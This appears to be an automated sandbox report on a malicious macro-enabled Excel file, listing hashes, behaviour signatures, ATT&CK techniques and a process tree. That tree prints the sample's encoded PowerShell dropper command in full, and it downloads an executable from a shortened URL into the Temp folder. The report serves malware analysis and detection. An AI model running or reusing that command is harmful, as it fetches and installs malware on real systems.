Analysis

  • max time kernel
    516s
  • max time network
    518s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    26-03-2021 16:21

General

  • Target

    ORDER COPY-326.xlsm

  • Size

    154KB

  • MD5

    9a30f275af39b20ce59988b3c1724a68

  • SHA1

    d35c17ba0c5f09cb212e0a50d117b91d278ec6b3

  • SHA256

    7fe87c98f71cb7cfad4b7713284b7cfe1a0a5e059d5eb5e2c1b322426a6e52ff

  • SHA512

    7898565b62505be720c625899fd3b9f1fb9338a8653066f2c9bf660a1f59fa16529ce4c8e6c1ee597fc3855992ca1e522dce536790c8268ca75684f79636031d

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cutt.ly/fxD7Hr0

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\ORDER COPY-326.xlsm"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1684
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c cmd /c powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAHUAdAB0AC4AbAB5AC8AZgB4AEQANwBIAHIAMAAnACwAKAAkAGUAbgB2ADoAVABlAG0AcAApACsAJwBcAGUAeABjAGUAbAAuAGUAeABlACcAKQA=
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1896
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAHUAdAB0AC4AbAB5AC8AZgB4AEQANwBIAHIAMAAnACwAKAAkAGUAbgB2ADoAVABlAG0AcAApACsAJwBcAGUAeABjAGUAbAAuAGUAeABlACcAKQA=
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1720
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAHUAdAB0AC4AbAB5AC8AZgB4AEQANwBIAHIAMAAnACwAKAAkAGUAbgB2ADoAVABlAG0AcAApACsAJwBcAGUAeABjAGUAbAAuAGUAeABlACcAKQA=
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1736

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1684-3-0x0000000071AC1000-0x0000000071AC3000-memory.dmp
    Filesize

    8KB

  • memory/1684-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1684-2-0x000000002F071000-0x000000002F074000-memory.dmp
    Filesize

    12KB

  • memory/1720-6-0x0000000000000000-mapping.dmp
  • memory/1736-12-0x00000000023F0000-0x00000000023F1000-memory.dmp
    Filesize

    4KB

  • memory/1736-13-0x00000000023F2000-0x00000000023F3000-memory.dmp
    Filesize

    4KB

  • memory/1736-8-0x00000000756A1000-0x00000000756A3000-memory.dmp
    Filesize

    8KB

  • memory/1736-9-0x000000006C7F0000-0x000000006CEDE000-memory.dmp
    Filesize

    6.9MB

  • memory/1736-10-0x0000000001E80000-0x0000000001E81000-memory.dmp
    Filesize

    4KB

  • memory/1736-11-0x0000000004730000-0x0000000004731000-memory.dmp
    Filesize

    4KB

  • memory/1736-33-0x000000007EF30000-0x000000007EF31000-memory.dmp
    Filesize

    4KB

  • memory/1736-7-0x0000000000000000-mapping.dmp
  • memory/1736-14-0x0000000004690000-0x0000000004691000-memory.dmp
    Filesize

    4KB

  • memory/1736-15-0x0000000005240000-0x0000000005241000-memory.dmp
    Filesize

    4KB

  • memory/1736-18-0x00000000055F0000-0x00000000055F1000-memory.dmp
    Filesize

    4KB

  • memory/1736-23-0x0000000005670000-0x0000000005671000-memory.dmp
    Filesize

    4KB

  • memory/1736-24-0x0000000006260000-0x0000000006261000-memory.dmp
    Filesize

    4KB

  • memory/1736-31-0x0000000005820000-0x0000000005821000-memory.dmp
    Filesize

    4KB

  • memory/1736-32-0x00000000062F0000-0x00000000062F1000-memory.dmp
    Filesize

    4KB

  • memory/1896-5-0x0000000000000000-mapping.dmp